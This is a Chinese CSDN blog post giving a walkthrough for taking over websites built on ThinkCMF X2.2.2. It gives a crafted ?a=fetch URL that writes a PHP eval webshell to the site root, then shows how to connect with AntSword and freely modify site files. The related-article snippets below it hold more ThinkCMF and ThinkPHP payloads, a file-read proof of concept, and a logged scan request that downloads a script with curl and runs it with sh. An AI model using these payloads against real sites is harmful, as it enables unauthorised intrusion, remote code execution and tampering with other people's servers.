ThinkCMF X2.2.2 漏洞获取网站权限测试

最新推荐文章于 2023-11-18 17:00:52 发布
最新推荐文章于 2023-11-18 17:00:52 发布
阅读量340 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xu_1234567/article/details/108589144
版权

1.测试环境

创建ThinkCMF X2.2.2框架,下载antsword,下面是AntSword官网
https://github.com/AntSwordProject/antSword/releases
下载完成后进行安装,安装教程可百度查询

2.漏洞利用

在ThinkCMF X2.2.2框架中通过构造a参数的fetch方法,创建文件在文件写入一句话木马代码,再利用AntSword获取网站权限对文件进行修改

3.漏洞测试

利用ThinkCMF X2.2.2框架漏洞通过构造a参数的fetch方法,在网站根目录下创建一句话木马文件
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('12.php','<?php @eval($_POST[shell]); ?>')</php>

在这里插入图片描述运行后是空白页面,没有任何显示。
进入AntSword在URL地址输入你创建一句话木马文件位置,连接密码是$_POST所传入的内容,完成后点击添加数据
在这里插入图片描述

成功后将生成如下数据,双击进去就能看见整个网站目录及文件,可在里面随意修改数据。
在这里插入图片描述在这里插入图片描述

村头王二狗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkCMF上传漏洞
X__WY__X的博客
09-14 821
ThinkCMF上传漏洞 一.漏洞描述 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 二.漏洞原理 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 三.环境搭建 下载ThinkCMF X2.2.0 链接:https:
ThinkCMF框架任意内容包含漏洞-实战
帅醉了的博客
10-12 520
漏洞影响版本: ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 1、phpinfo版payload如下: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<
一句话木马的适用环境和工作原理/原理应用解析
kendyhj9999的专栏
01-26 1701
一句话木马的适用环境和工作原理/原理应用解析 2011-12-20 10:17:27     我来说两句       收藏    我要投稿  http://www.2cto.com/Article/201112/114599.html 一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据
ThinkPHP 系列漏洞
最新发布
SHELLCODE_8BIT的博客
11-18 3421
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1262
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkCMF 任意文件包含漏洞复现
weixin_43740200的博客
11-15 867
这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。 搭建环境,放到服务器上。 先来试试读取README文件 http://127.0.0.1/?a=display&templateFile=REMADE.md kn1feemmm,好使,再来读读系统文件 http://127.0.0.1/?a=display&templateFile=/etc/pa...
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF X1.6.0、ThinkCMF X2.1.0、ThinkCMF X2.2.0、ThinkCMF X2.2.1、ThinkCMF X2.2.2 都存在该漏洞。 环境搭建: 1. 下载 ThinkCMF X2.2.2,解压后放在 WWW 目录下,然后浏览器访问即可看到安装页面。 漏洞...
cocos2d-x-2.2.2旧版引擎下载
09-17
cocos2d-x-2.2.2下载,不多说。或者可以下载另一个资源 cocos引擎老版本集合(cocos2d-x-2.2.1 - 3.5) http://download.csdn.net/download/crazymagicdc/9982656
thinkcmf2.23
07-24
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架(CMF),我们一直秉承ThinkPHP大道至简的理念,坚持做最简约的ThinkPHP开源软件,多应用化开发方式,让您更快地完成自己的创业项目!
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。...
cocos2d-x2.2.2 API帮助文档
02-13
《cocos2d-x2.2.2 API帮助文档》是针对游戏开发人员的重要参考资料,主要涵盖cocos2d-x 2.2.2版本的API接口和功能介绍。cocos2d-x是一个广泛使用的开源游戏开发框架,它基于C++,支持多种平台,包括iOS、Android、...
ThinkPHP漏洞大全
热门推荐
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
104.202.60.2/.index.php,web扫描
weixin_42110038的博客
03-27 1226
有几个人长期扫描我的网站= =!我吐了default 敏感目录访问 52.173.33.21 /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 2020-07-28 ...
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1612
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
thinkcmf5.0.180901 远程代码执行漏洞分析
qq_21510303的专栏
02-03 5728
最近thinkcmf爆出了一个后台登录后的远程代码执行漏洞,非常好奇看了下决定写一个分析过程分析下如何执行代码的。如何搭建环境就不多介绍了,大家可以phpstudy或者xampp,thinkcmf 的源代码可以直接从github或者码云上下载。历史版本自己找下下面开始我的分析。 首先先执行下漏洞,安装好后admin身份直接登陆,在后台-设置-url美化-添加url规则,设置内容 原始网址 por...
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1311
Thinkphp漏洞复现
ThinkCMFX漏洞合集
https://www.cnblogs.com/zpchcbd/
08-13 5616
前台的SQL注入(需要前台会员权限) : POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1 Host: localhost Connection: close Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95 Content-Type: application/...
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2034
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1436
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛中的Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,中文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
nacos2.2.2开启登录权限
05-30
Nacos 2.2.2 默认不开启登录权限,所有用户都可以访问 Nacos 控制台。如果需要开启登录权限,可以按照以下步骤操作: 1. 修改配置文件 在 Nacos 的 `conf` 目录下找到 `application.properties` 文件,添加以下配置: ``` nacos.security.enabled=true nacos.security.username=username nacos.security.password=password ``` 其中 `username` 和 `password` 分别是你要设置的用户名和密码。 2. 重启 Nacos 修改配置文件后需要重启 Nacos 才能生效。 3. 访问 Nacos 控制台 在浏览器中访问 Nacos 控制台时,会弹出登录框。输入用户名和密码即可登录。 注意:开启登录权限后,需要在控制台上配置权限才能让其他用户访问 Nacos 控制台。具体操作请参考 Nacos 官方文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值